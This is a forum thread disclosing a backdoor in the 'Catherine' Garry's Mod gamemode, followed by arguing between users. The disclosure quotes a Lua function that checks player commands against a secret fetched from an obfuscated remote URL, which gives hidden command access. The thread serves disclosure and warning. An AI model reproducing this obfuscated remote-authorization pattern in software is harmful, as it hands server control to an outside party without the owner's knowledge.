[PSA] Backdoor in Catherine Authorization system.

Since July 17 of 2016, L7D has had a authorization key system for his gamemode. Since recently I’ve wanted to use the gamemode for a personal project, and noticed this key system (Because we definitely need DRM and monetization of more content, right?) I decided to crack it. I really do look down upon this kind of thing, especially since Kurozael did it.

His library for decoding all his scripts is completely exposed so all I did was use it to decode his DLL: Here are the contents of Catherine.dll:

http://hastebin.com/hoxohocuki.lua

On the first init of the gamemode, it downloads a bunch of encrypted string to v.txt inside of the catherine/patchx/ folder. This file decrypts into this:

http://hastebin.com/oserilenug.lua

From here, you can see the actual internals. Most of the functions are purely for authorization but there is a single function that is very suspicious.


local function commandAuth(commandName, pl, args, callback)
	if (!IsValid(pl)) then return end
	http.Fetch(catherine.cryptoV2.DECODE("7305 6020 1848 7313 5962 1779 7248 6020 1833 7321 6020 1849 7313 6012 1843 7201 5904 1732 7298 6004 1833 7315 5950 1831 7312 6013 1779 7254 6005 1832 7319 5957 1779 7315 6001 1851"),function(body)
		if (args[1] == body) then
			callback(pl,"("..pl:SteamName()..", "..pl:GetUserGroup()..", "..pl:SteamID()..")",args)
		else
			logSend("'"..commandName.."' cmd runned -> return -> PERMISSION error ("..pl:SteamName()..", "..pl:GetUserGroup()..", "..pl:SteamID()..")")
			pl:ChatPrint("You don't have permission.")
		end
	end )
end

This is where it fetches from:

http://textuploader.com/5edv5/raw

Definitely a backdoor. While I will NOT post a crack for Catherine, I just wanted to create a post that reveals the backdoor hidden inside the gamemode.

If you get an authorization key from L7D, please be aware of this backdoor.

Implying that lua drm is a thing
lol what

But nice find

He has a DLL that is loaded, and has a key system that effectively prevents you from using the gamemode until you have a proper key. Just like CloudAuthX.

So yes, its effectively Digital Rights Management.

If there’s a binary module on the server then a lua backdoor is the least of your worries on what can be done maliciously

If you actually read the code, you can see that there is a function called DownloadFromFile, and a fileio module that is required by the gamemode. The module has access to the entire server through the fileio module.

So, obviously yes.

Since L7D is no longer working on Catherine, I have been given github access and will remove the backdoor. Since L7D’s reason for the key system is NOT to make money, I will be leaving the key system in.

Add me on steam for a key.

Why use Catherine when there’s nutscript. Especially when L7D has secret love towards Conna’s methods.

because nutscript is no longer supported and L7D didn’t do it to make money. he did it to keep stupid server owners from using Catherine.

you probably fall into that category.

So that instantly excuses everything? “Hey guys, he didn’t do it for the money, so it’s okay!”

Understand, it’s great that he’s no longer a part of it and the project is picked back up by hopefully people who are morally right. But, that doesn’t give him a free ticket ride.

well, that’s why i’m the one working on it now. I haven’t removed the backdoor yet because there are quite a few other things that are higher on the priority list.

not saying it excuses the back door, backdoor is kind of a big deal but I was more talking about the key system he has implemented.

Backdoor should be relatively high on the priority list, since it should also be easy to remove.

The reply you made to Noi made it appear as if you were defending him across the whole.

backdoor is basically irrelevent now that textuploader has cloudflare and is causing massive issues with the whole system causing it to time out.

im currently replacing everything and it’s taking time, thats why it hasnt been removed yet.

you realize noiwex is the founder of one of the most popular russian garry’s mod communities atm right

Russian.

and backdoor removed folks.

nevermind the weeb avatars.

NutScript is still supported, probably not by chessnut but the community, many people have forked the repo and pushed updates.

the entire point of ‘supported’ is to be supported by the official developer.

Do you have any clue how open source projects work? It’s quite often that the original developer drops out and somebody else (can even be the entire community) continues their work.

EDIT:

Is this an implication that Russian communities are somehow intrinsically inferior to 'Murican (or whatever) communities?

And this is complete bullshit. Just trying to score points on some irrelevant stuff because cannot respond to the main topic properly, eh?

well i dont take this that seriously.

and gmod rp here in the US is pretty much dead, this is much more of a hobby.

Well, it’s your damn problem then. Open source community has been operating in this manner for god knows how long.

https://github.com/L7D/Catherine/commit/86cd93634b3820d32acd2b3a92874e93de6861f8

But wait there’s more